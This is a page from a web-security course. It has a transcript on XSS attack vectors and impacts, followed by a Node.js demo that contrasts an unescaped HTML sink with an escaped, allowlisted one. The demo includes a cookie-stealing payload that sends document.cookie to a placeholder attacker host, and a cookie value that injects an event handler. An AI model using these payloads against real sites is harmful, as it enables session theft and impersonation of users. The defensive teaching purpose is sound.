
Threat Analysis: What Damage Can Be Done by Targeting XSS?

In this video, Paulo Silva will explain more about how hackers target XSS and the damage they can do.
Let’s put things simply regarding XSS attack vectors. You just have to focus on user-controlled data, regardless of its source. URL parameters and form data may be the first things to come to your mind, but there’s a lot more. You should realize that users control the HTTP request, and so request headers and cookies may also be sources of hostile data. The browser’s local storage is another typical attack vector, since malicious actors may be able to tamper with it. If your application expects file uploads such as photos, and then reads the photo’s metadata, that metadata can also be used as an attack vector. Finally, a less obvious source of hostile data: external services.
If the application retrieves data from other services, for example by means of APIs, malicious actors may decide to go after those third-party services, indirectly compromising your application. Any data source is a potential attack vector. Keep in mind that attackers will be able to execute code remotely in victims’ browsers. The first thing attackers will look for is session tokens. If they can exfiltrate such a token from a victim’s browser, chances are they will be able to use it in another browser to impersonate the victim. This is called session hijacking.
Even if session hijacking is not possible, attackers will be able to use JavaScript to automate tasks, to scrape user data from the DOM, or to perform actions on the victim’s behalf, such as fraudulent transactions. Being able to execute code remotely in specific pages, such as the login page, may give attackers access to credentials. There are other techniques to trick the browser and password managers into leaking credentials. Among other impacts, attackers will always be able to exploit the trust relationship between the victim and the website owner, driving the former to download and install malware. Technical skills are required to identify and exploit a cross-site scripting vulnerability.
Nevertheless, there are automated tools to assist with this task and plenty of information about the subject. Threat agents may be after specific victims. Targeting an application administrator may allow attackers to gain control over a privileged account and access sensitive data or shut down the system. On the other hand, attackers may be interested in a particular individual, let’s say a VIP. If your application manages sensitive data, such as health records, XSS exploitation may give attackers access to sensitive information regarding that individual. XSS can also be used for widespread attacks. It has already happened in the past, creating a worm effect.
To identify threat agents, consider who may want to gain control over your application, how sensitive the information your application manages is, and who may want to access it. You’ll find this table in the OWASP Top 10. Pause the video and take your time to carefully read it. In the next part, we will exploit XSS on our intentionally vulnerable application.
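To make the transcript’s point concrete, here is an added example (not part of the course material) that models three of the sources named above, the URL query string, the Cookie request header and a third-party API response, feeding the same HTML-building sink, first unescaped and then hardened. It runs under Node with plain strings standing in for the real DOM; the payload, the cookie header and the upstream JSON are constructed for the demonstration, and attacker.example is a placeholder host.

```javascript
// Added example, not from the course: three attacker-controlled sources named
// in the transcript (query string, Cookie header, third-party API response)
// all flow into the same HTML-building sink. Runs under Node; the browser is
// modelled with plain strings, so no real DOM is involved.

// --- Sources --------------------------------------------------------------

// URL query string, i.e. the part after "?" in the address bar.
function parseQuery(search) {
  const out = {};
  for (const pair of search.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const idx = pair.indexOf('=');
    const k = idx < 0 ? pair : pair.slice(0, idx);
    const v = idx < 0 ? '' : pair.slice(idx + 1);
    out[decodeURIComponent(k)] = decodeURIComponent(v.replace(/\+/g, ' '));
  }
  return out;
}

// Cookie request header, "name=value; other=value". Cookie values are sent by
// the client, so the server must treat them as hostile just like a form field.
function parseCookieHeader(header) {
  const out = {};
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    out[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return out;
}

// Response from an upstream API: trusted by habit, but a compromised
// third party can return anything.
function parseUpstream(json) {
  return JSON.parse(json);
}

// --- Sinks ----------------------------------------------------------------

// Vulnerable: raw values are interpolated straight into markup.
function renderProfileUnsafe(name, theme, bio) {
  return `<div class="card ${theme}"><h2>${name}</h2><p>${bio}</p></div>`;
}

// Escape the five characters that matter in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: text content is escaped, and the value that lands in a class
// attribute is checked against an allowlist rather than trusted at all.
const ALLOWED_THEMES = new Set(['light', 'dark']);
function renderProfileSafe(name, theme, bio) {
  const safeTheme = ALLOWED_THEMES.has(theme) ? theme : 'light';
  return `<div class="card ${safeTheme}"><h2>${escapeHtml(name)}</h2><p>${escapeHtml(bio)}</p></div>`;
}

// --- Constructed inputs (for the demonstration only) ----------------------

// Session-stealing payload of the kind the transcript describes: on load it
// sends document.cookie to an attacker-controlled host (placeholder name).
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

const QUERY = parseQuery('?name=' + encodeURIComponent(PAYLOAD));
// A cookie value that breaks out of the class attribute.
const COOKIES = parseCookieHeader('session=abc123; theme=dark" onmouseover="alert(1)');
const UPSTREAM = parseUpstream(JSON.stringify({ bio: PAYLOAD }));

// Render the same inputs through both sinks and report whether live markup
// from any of the three sources survived.
function demo() {
  const unsafe = renderProfileUnsafe(QUERY.name, COOKIES.theme, UPSTREAM.bio);
  const safe = renderProfileSafe(QUERY.name, COOKIES.theme, UPSTREAM.bio);
  return {
    unsafe,
    safe,
    unsafeInjected: unsafe.includes('<img') && unsafe.includes('" onmouseover='),
    safeInjected: safe.includes('<img') || safe.includes('" onmouseover='),
  };
}

console.log(demo());
```

Two points worth noting from the output. The unsafe render shows the same payload arriving through the query string and through the upstream API indistinguishably, and the cookie value needs no script tag at all: it simply closes the class attribute and adds an event handler. The exfiltration in the payload only works against cookies that lack the HttpOnly flag; with HttpOnly set the script cannot read the token, but it can still act on the victim’s behalf from inside the page, which is why escaping at the sink rather than relying on cookie flags is the actual fix. Escaping is context-specific: the HTML-text escape used here is not sufficient for values placed into URLs, inline JavaScript or unquoted attributes.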

In this video, you will learn more about how hackers target XSS.

In the previous step, you learned what XSS is and then read the OWASP page on XSS. Now you will learn more about how hackers target XSS and the damage they can do.

This article is from the free online course Advanced Cyber Security Training: OWASP Top 10 and Web Application Fundamentals

Created by
FutureLearn - Learning For Life
